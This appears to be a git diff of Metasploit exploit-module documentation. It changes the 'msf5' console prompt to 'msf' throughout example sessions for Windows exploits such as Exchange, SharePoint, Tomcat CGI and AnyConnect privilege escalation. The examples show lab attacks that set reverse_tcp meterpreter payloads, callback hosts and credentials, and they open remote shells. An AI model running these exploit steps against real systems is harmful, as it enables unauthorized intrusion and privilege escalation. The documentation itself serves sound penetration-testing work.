USERNAME => msflab.local\jdoe -msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1 +msf exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1 PASSWORD => Password1 -msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1 +msf exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1 TARGET => 1 -msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128 +msf exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 -msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit +msf exploit(windows/http/exchange_ecp_viewstate) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Command Stager progress - 3.61% done (449/12424 bytes) diff --git a/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md b/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md index fff2ec85be..f7483817e2 100644 --- a/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md +++ b/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md @@ -26,10 +26,10 @@ Once installed run the application and click "Start" to enable the server. ## Scenarios ``` -msf5 > use exploit/windows/http/file_sharing_wizard_seh -msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101 +msf > use exploit/windows/http/file_sharing_wizard_seh +msf exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 -msf5 exploit(windows/http/file_sharing_wizard_seh) > run +msf exploit(windows/http/file_sharing_wizard_seh) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.101:80 - Connecting to target diff --git a/documentation/modules/exploit/windows/http/gitstack_rce.md b/documentation/modules/exploit/windows/http/gitstack_rce.md index 8e486bab88..c8da26b62c 100644 --- a/documentation/modules/exploit/windows/http/gitstack_rce.md +++ b/documentation/modules/exploit/windows/http/gitstack_rce.md @@ -33,12 +33,12 @@ be under a certain size. ### GitStack v2.3.10 on Windows 7 SP1 ``` -msf5 > use exploit/windows/http/gitstack_rce -msf5 exploit(windows/http/gitstack_rce) > set rhost 172.22.222.122 +msf > use exploit/windows/http/gitstack_rce +msf exploit(windows/http/gitstack_rce) > set rhost 172.22.222.122 rhost => 172.22.222.122 -msf5 exploit(windows/http/gitstack_rce) > set verbose true +msf exploit(windows/http/gitstack_rce) > set verbose true verbose => true -msf5 exploit(windows/http/gitstack_rce) > run +msf exploit(windows/http/gitstack_rce) > run [*] Started reverse TCP handler on 172.22.222.131:4444 [*] Powershell command length: 6103 diff --git a/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md b/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md index 12435d6b04..a8a5594f1c 100644 --- a/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md +++ b/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md @@ -39,7 +39,7 @@ The vulnerable application is available for download at: ### Kentico CMS v11.0 trial on Windows 7 SP 1 x64 ``` -msf5 exploit(windows/http/kentico_staging_syncserver) > show options +msf exploit(windows/http/kentico_staging_syncserver) > show options Module options (exploit/windows/http/kentico_staging_syncserver): @@ -73,7 +73,7 @@ Exploit target: 0 Windows EXE Dropper -msf5 exploit(windows/http/kentico_staging_syncserver) > exploit +msf exploit(windows/http/kentico_staging_syncserver) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Command Stager progress - 24.99% done (2999/12002 bytes) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index c8af3b319b..fd4c2d6338 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -26,17 +26,17 @@ A successful check of the exploit will look like this: ## Scenarios ``` -msf5 > -msf5 > use exploit/windows/http/manageengine_appmanager_exec -msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192 +msf > +msf > use exploit/windows/http/manageengine_appmanager_exec +msf exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192 RHOST => 12.0.0.192 -msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1 +msf exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(windows/http/manageengine_appmanager_exec) > check +msf exploit(windows/http/manageengine_appmanager_exec) > check [+] 12.0.0.192:9090 The target is vulnerable. -msf5 exploit(windows/http/manageengine_appmanager_exec) > run +msf exploit(windows/http/manageengine_appmanager_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Triggering the vulnerability diff --git a/documentation/modules/exploit/windows/http/oats_weblogic_console.md b/documentation/modules/exploit/windows/http/oats_weblogic_console.md index 38cdce0a6b..0718232620 100644 --- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md +++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md @@ -30,9 +30,9 @@ credentials, decrypt them using a third-party tool, and then use this module to ## Scenarios ``` -msf5 exploit(windows/http/oats_weblogic_console) > check +msf exploit(windows/http/oats_weblogic_console) > check [*] 172.16.135.128:8088 - The target service is running, but could not be validated. -msf5 exploit(windows/http/oats_weblogic_console) > run +msf exploit(windows/http/oats_weblogic_console) > run [*] Started reverse TCP handler on 172.16.135.1:4444 [+] Logged in as oats:VeryPhat1337 diff --git a/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md b/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md index a0a4fa6527..0bcc5b121e 100644 --- a/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md +++ b/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md @@ -56,8 +56,8 @@ set to port **8401** by default for Plesk installations. ### myLittleAdmin 3.8 on Plesk Obsidian on Windows Server 2016 ``` -msf5 > use exploit/windows/http/plesk_mylittleadmin_viewstate -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > options +msf > use exploit/windows/http/plesk_mylittleadmin_viewstate +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > options Module options (exploit/windows/http/plesk_mylittleadmin_viewstate): @@ -91,11 +91,11 @@ Exploit target: 2 PowerShell Stager -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169 +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169 rhosts => 172.16.249.169 -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1 +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md index 1975c49b8f..9b11f2e7db 100644 --- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md +++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md @@ -113,7 +113,7 @@ Amount of seconds to sleep waiting on the server to reboot. In testing `10` see PLEX_TOKEN => aa1g1aa3aaHbAtPBsEG7 resource (plex.rb)> set verbose true verbose => true - msf5 exploit(windows/http/plex_unpickle_dict_rce) > exploit + msf exploit(windows/http/plex_unpickle_dict_rce) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Gathering Plex Config diff --git a/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md b/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md index ca8139c659..df4feee663 100644 --- a/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md +++ b/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md @@ -46,28 +46,28 @@ Administration web interface **is not vulnerable**. To configure SharePoint to b ### SharePoint 2016 on Server 2016 ``` -msf5 > use exploit/windows/http/sharepoint_data_deserialization +msf > use exploit/windows/http/sharepoint_data_deserialization [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp -msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168 +msf exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168 RHOSTS => 192.168.63.168 -msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80 +msf exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80 RPORT => 80 -msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false +msf exploit(windows/http/sharepoint_data_deserialization) > set SSL false [!] Changing the SSL option's value may require changing RPORT! SSL => false -msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v +msf exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v VHOST => ec2amaz-v2pri0v -msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre +msf exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre USERNAME => smcintyre -msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1 +msf exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1 PASSWORD => Password1 -msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT +msf exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT DOMAIN => SHRPNT -msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/http/sharepoint_data_deserialization) > check +msf exploit(windows/http/sharepoint_data_deserialization) > check [*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form. -msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit +msf exploit(windows/http/sharepoint_data_deserialization) > exploit [*] Executing automatic check (disable AutoCheck to override) [!] The service is running, but could not be validated. Received the quicklinks HTML form. diff --git a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md index a2017563f1..7e00364d02 100644 --- a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md +++ b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md @@ -19,7 +19,7 @@ sent to SharePoint via the Workflows functionality. ### SharePoint 2019 on Server 2016 ``` -msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options +msf exploit(windows/http/sharepoint_workflows_xoml) > show options Module options (exploit/windows/http/sharepoint_workflows_xoml): @@ -56,7 +56,7 @@ Exploit target: 2 Windows Powershell -msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit +msf exploit(windows/http/sharepoint_workflows_xoml) > exploit [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. @@ -75,4 +75,4 @@ Meterpreter : x64/windows meterpreter > getuid Server username: SHRPNT2019P\Administrator meterpreter > -``` \ No newline at end of file +``` diff --git a/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md b/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md index 1335c3e0d2..61126c8bcd 100644 --- a/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md +++ b/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md @@ -48,22 +48,22 @@ from "Site Settings" to add the necessary privileges.** ### SSRS 2016 on Server 2012 x64 - msf5 > use exploit/windows/http/ssrs_navcorrector_viewstate - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set RHOSTS 192.168.159.141 + msf > use exploit/windows/http/ssrs_navcorrector_viewstate + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set RHOSTS 192.168.159.141 RHOSTS => 192.168.159.141 - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set USERNAME jdoe + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set USERNAME jdoe USERNAME => jdoe - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set DOMAIN msflab.local + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set DOMAIN msflab.local DOMAIN => msflab.local - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PASSWORD Password1 + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set PASSWORD Password1 PASSWORD => Password1 - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set LHOST 192.168.159.128 + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > check + msf exploit(windows/http/ssrs_navcorrector_viewstate) > check [*] 192.168.159.141:80 - The service is running, but could not be validated. - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > exploit + msf exploit(windows/http/ssrs_navcorrector_viewstate) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Command Stager progress - 24.99% done (2999/12002 bytes) diff --git a/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md b/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md index c4a53d497f..e459b41165 100644 --- a/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md +++ b/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md @@ -70,14 +70,14 @@ echo Hello, World! The check method of the exploit explicitly triggers the bug to verify the vulnerable, therefore it should be accurate. To use it, here is an example: ``` -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > check [+] 172.16.135.141:8080 - The target is vulnerable. ``` #### Code Execution ``` -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit [*] Started reverse TCP handler on 172.16.135.1:4444 [*] Checking if 172.16.135.141 is vulnerable @@ -106,9 +106,9 @@ meterpreter > ### Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200) ``` -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > check [+] 2.2.2.2:8080 - The target is vulnerable. -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > run [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Checking if 2.2.2.2 is vulnerable diff --git a/documentation/modules/exploit/windows/http/zentao_pro_rce.md b/documentation/modules/exploit/windows/http/zentao_pro_rce.md index 972713b8e2..cb5d0d4493 100644 --- a/documentation/modules/exploit/windows/http/zentao_pro_rce.md +++ b/documentation/modules/exploit/windows/http/zentao_pro_rce.md @@ -51,7 +51,7 @@ Id Name ## Scenarios ### ZenTao 8.8.2 running on Windows 10 (XAMPP server) ``` -msf5 exploit(windows/http/zentao_pro_rce) > show options +msf exploit(windows/http/zentao_pro_rce) > show options Module options (exploit/windows/http/zentao_pro_rce): @@ -88,7 +88,7 @@ Exploit target: 1 Windows (x64) -msf5 exploit(windows/http/zentao_pro_rce) > run +msf exploit(windows/http/zentao_pro_rce) > run [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Successfully authenticated to ZenTao 8.8.2. diff --git a/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md b/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md index f63a8a1ecc..cbd0825e20 100644 --- a/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md +++ b/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md @@ -29,10 +29,10 @@ The exploit module contains several targets as detailed below. This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). ``` -msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 +msf > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.200:11006 - Connected to IBM WAS DMGR. @@ -59,16 +59,16 @@ meterpreter > exit This target isn't a formal target. It was added to allow a user to execute commands entirely through the IBM Websphere Application Network Deployment Server remote administration feature. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0. ``` -msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 +msf > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set target 1 +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set target 1 target => 1 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload cmd/windows/generic +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload cmd/windows/generic payload => cmd/windows/generic -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set cmd "ping -n 10 172.22.222.200" +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set cmd "ping -n 10 172.22.222.200" cmd => ping -n 10 172.22.222.200 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > run +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > run [*] 172.22.222.200:11006 - Connected to IBM WAS DMGR. [*] 172.22.222.200:11006 - Server responded diff --git a/documentation/modules/exploit/windows/local/alpc_taskscheduler.md b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md index 4cbb38d5e1..3e597dd03e 100644 --- a/documentation/modules/exploit/windows/local/alpc_taskscheduler.md +++ b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md @@ -27,12 +27,12 @@ Affected Windows OS versions and related patch details can be found in the [Micr ### Tested on Windows 10 Pro Version 1803 x64 ``` -msf5 > use exploit/windows/local/alpc_taskscheduler -msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp +msf > use exploit/windows/local/alpc_taskscheduler +msf exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 +msf exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(windows/local/alpc_taskscheduler) > sessions +msf exploit(windows/local/alpc_taskscheduler) > sessions Active sessions =============== @@ -42,17 +42,17 @@ Active sessions 1 shell x64/windows Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al... 172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200) 2 meterpreter x64/windows DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR 172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200) -msf5 exploit(windows/local/alpc_taskscheduler) > set session 1 +msf exploit(windows/local/alpc_taskscheduler) > set session 1 session => 1 -msf5 exploit(windows/local/alpc_taskscheduler) > exploit +msf exploit(windows/local/alpc_taskscheduler) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.22.222.136:4444 [-] Exploit aborted due to failure: none: Only meterpreter sessions are supported [*] Exploit completed, but no session was created. -msf5 exploit(windows/local/alpc_taskscheduler) > set session 2 +msf exploit(windows/local/alpc_taskscheduler) > set session 2 session => 2 -msf5 exploit(windows/local/alpc_taskscheduler) > exploit +msf exploit(windows/local/alpc_taskscheduler) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Checking target... @@ -76,13 +76,13 @@ Logged On Users : 3 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 3... -msf5 exploit(windows/local/alpc_taskscheduler) > set session 3 +msf exploit(windows/local/alpc_taskscheduler) > set session 3 session => 3 -msf5 exploit(windows/local/alpc_taskscheduler) > exploit +msf exploit(windows/local/alpc_taskscheduler) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Checking target... [-] Exploit aborted due to failure: none: Session is already elevated [*] Exploit completed, but no session was created. -msf5 exploit(windows/local/alpc_taskscheduler) > +msf exploit(windows/local/alpc_taskscheduler) > ``` diff --git a/documentation/modules/exploit/windows/local/anyconnect_lpe.md b/documentation/modules/exploit/windows/local/anyconnect_lpe.md index 7e0c841ec0..360b190ab2 100644 --- a/documentation/modules/exploit/windows/local/anyconnect_lpe.md +++ b/documentation/modules/exploit/windows/local/anyconnect_lpe.md @@ -73,24 +73,24 @@ been provided. ### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433 ``` -msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1 +msf exploit(windows/local/anyconnect_lpe) > set SESSION 1 SESSION => 1 -msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 +msf exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 lhost => 192.168.1.24 -msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445 +msf exploit(windows/local/anyconnect_lpe) > set lport 4445 lport => 4445 -msf5 exploit(windows/local/anyconnect_lpe) > set verbose true +msf exploit(windows/local/anyconnect_lpe) > set verbose true verbose => true -msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433 +msf exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433 CVE => CVE-2020-3433 -msf5 exploit(windows/local/anyconnect_lpe) > check +msf exploit(windows/local/anyconnect_lpe) > check [*] Try to detect installation path... [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe' [*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433). -msf5 exploit(windows/local/anyconnect_lpe) > run +msf exploit(windows/local/anyconnect_lpe) > run [*] Started reverse TCP handler on 192.168.1.24:4445 [*] Try to detect installation path... @@ -124,24 +124,24 @@ Meterpreter : x86/windows ### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3153 ``` -msf5 exploit(windows/local/anyconnect_lpe) > set session 4 +msf exploit(windows/local/anyconnect_lpe) > set session 4 session => 4 -msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 +msf exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 lhost => 192.168.1.24 -msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445 +msf exploit(windows/local/anyconnect_lpe) > set lport 4445 lport => 4445 -msf5 exploit(windows/local/anyconnect_lpe) > set verbose true +msf exploit(windows/local/anyconnect_lpe) > set verbose true verbose => true -msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153 +msf exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153 cve => CVE-2020-3153 -msf5 exploit(windows/local/anyconnect_lpe) > check +msf exploit(windows/local/anyconnect_lpe) > check [*] Try to detect installation path... [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe' [*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433). -msf5 exploit(windows/local/anyconnect_lpe) > run +msf exploit(windows/local/anyconnect_lpe) > run [*] Started reverse TCP handler on 192.168.1.24:4445 [*] Try to detect installation path... @@ -173,24 +173,24 @@ Meterpreter : x86/windows ### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3433 ``` -msf5 exploit(windows/local/anyconnect_lpe) > set session 4 +msf exploit(windows/local/anyconnect_lpe) > set session 4 session => 4 -msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 +msf exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 lhost => 192.168.1.24 -msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445 +msf exploit(windows/local/anyconnect_lpe) > set lport 4445 lport => 4445 -msf5 exploit(windows/local/anyconnect_lpe) > set verbose true +msf exploit(windows/local/anyconnect_lpe) > set verbose true verbose => true -msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433 +msf exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433 cve => CVE-2020-3433 -msf5 exploit(windows/local/anyconnect_lpe) > check +msf exploit(windows/local/anyconnect_lpe) > check [*] Try to detect installation path... [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe' [*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433). -msf5 exploit(windows/local/anyconnect_lpe) > run +msf exploit(windows/local/anyconnect_lpe) > run [*] Started reverse TCP handler on 192.168.1.24:4445 [*] Try to detect installation path... diff --git a/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md b/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md index 7843178450..328652942d 100644 --- a/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md +++ b/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md @@ -27,12 +27,12 @@ ### Tested on Windows 10 Version 1709 Build 16299.125 ``` - msf5 > use multi/handler - msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp + msf > use multi/handler + msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (206403 bytes) to 192.168.37.135 @@ -42,14 +42,14 @@ Server username: DESKTOP-L5FDSM7\Shelby Pace meterpreter > background [*] Backgrounding session 1... - msf5 exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 1 + msf exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc + msf exploit(windows/local/appxsvc_hard_link_privesc) > set session 1 session => 1 - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp + msf exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1 + msf exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > run + msf exploit(windows/local/appxsvc_hard_link_privesc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.37.1:4444 diff --git a/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md b/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md index 70b8abca76..20c29f401f 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md +++ b/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md @@ -23,7 +23,7 @@ process, but others would work, too. ### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64 ``` -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run +msf exploit(windows/local/bypassuac_dotnet_profiler) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... @@ -76,10 +76,10 @@ meterpreter > ### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64 ``` -msf5 exploit(multi/handler) > use 